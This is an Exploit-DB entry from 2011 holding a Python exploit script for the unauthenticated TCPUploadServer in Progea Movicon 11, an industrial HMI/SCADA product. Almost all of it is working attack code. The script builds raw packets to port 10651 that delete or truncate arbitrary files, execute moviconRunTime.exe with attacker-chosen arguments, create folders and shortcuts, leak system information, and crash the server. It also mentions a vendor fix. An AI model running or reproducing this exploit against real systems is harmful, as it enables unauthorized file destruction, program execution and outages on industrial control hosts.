Progea Movicon 11 - 'TCPUploadServer' Remote File System

EDB-ID:

17034




Platform:

Windows

Date:

2011-03-23


#!/usr/bin/python
# movi.py
# Progea Movicon TCPUploadServer Remote Exploit
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# TCPUploadServer allows remote users to execute functions on the server
# without any form of authentication. Impacts include deletion of arbitrary
# files, execution of a program with an arbitrary argument, crashing the
# server, information disclosure, and more. This design flaw puts the host
# running this server at risk of potentially unauthorized functions being
# executed on the system.
#
# Tested on Progea Movicon 11 TCPUploadServer running on Windows
#
# Fix: http://support.progea.com/download/Mov11.2_Setup.zip
#

import sys
import socket

hdr="MovX"

funcs=(1,2,3,4,5,6,7,8) # "B" is listed as 8 only for convience. other functions include (the real) 8, 9, A, and V

if len(sys.argv)<3:
     print "Progea Movicon TCPUploadServer Remote Exploit"
     print "Usage: %s <target> <function> [data]"%sys.argv[0]
     print "\nWhat would you like to do?\n"
     print "[1] Create a folder"
     print "[2] Overwrite a file with NULL and cause 100%% CPU"
     print "[3] Delete a file"
     print "[4] Execute moviconRunTime.exe with a specified argument"
     print "[5] Create a desktop shortcut"
     print "[6] Retrieve drive information"
     print "[7] Retrieve os service pack"
     print "[8] Crash the server\n"
     print "* Default data is \"test\""
     sys.exit(0)

target=sys.argv[1]
port=10651
cs=target,port

func=int(sys.argv[2])

if len(sys.argv)==4:
     data=sys.argv[3]
else:
     data="test"

if func not in funcs:
     print "Invalid function"
     sys.exit(1)

if(func==1):
     print "Crafting a packet to create the folder \"%s\"..."%data
     pkt=hdr+"1"+"B"+data+"\x00"*(66-len(data))

elif(func==2):
     print "Crafting a packet to truncate (or create) the file \"%s\" to 0 bytes and cause 100%% CPU..."%data
     pkt=hdr+"2"+"B"+data+"\x00"*(66-len(data))
     # O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's supposedly a copy function, but i'm moving on

elif(func==3):
     print "Crafting a packet to delete the file \"%s\"..."%data
     pkt=hdr+"3"+"B"+data+"\x00"*(66-len(data))

elif(func==4):
     print "Crafting a packet to execute moviconRunTime.exe with the argument \"%s\"..."%data
     pkt=hdr+"4"+"BB"+data+"\x00"*(65-len(data))

elif(func==5):
     print "Crafting a packet to create a desktop shortcut with the name (also appended to the link path) \"%s\"..."%data
     pkt=hdr+"5"+"B"+data+"\x00"*(66-len(data))

elif(func==6):
     print "Crafting a packet to retrieve drive information..."
     pkt=hdr+"6"+"\x01"

elif(func==7):
     print "Crafting a packet to retrieve os service pack..."
     pkt=hdr+"7"+"\x00"

elif(func==8):
     print "Crafting a packet to crash the server..."
     pkt=hdr+"B"+"\x00"

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)

sock.send(pkt)
sock.send(pkt)

print "\nPacket sent!"

if((func==6)|(func==7)):
     info=sock.recv(128)
     
     if(info):
          print "\nRetrieved info:\n"
          if(func==6):
               print "%s"%info[6:]
          elif(func==7):
               print "%s"%info[22:]
     else:
          print "\nNo info"

sock.close()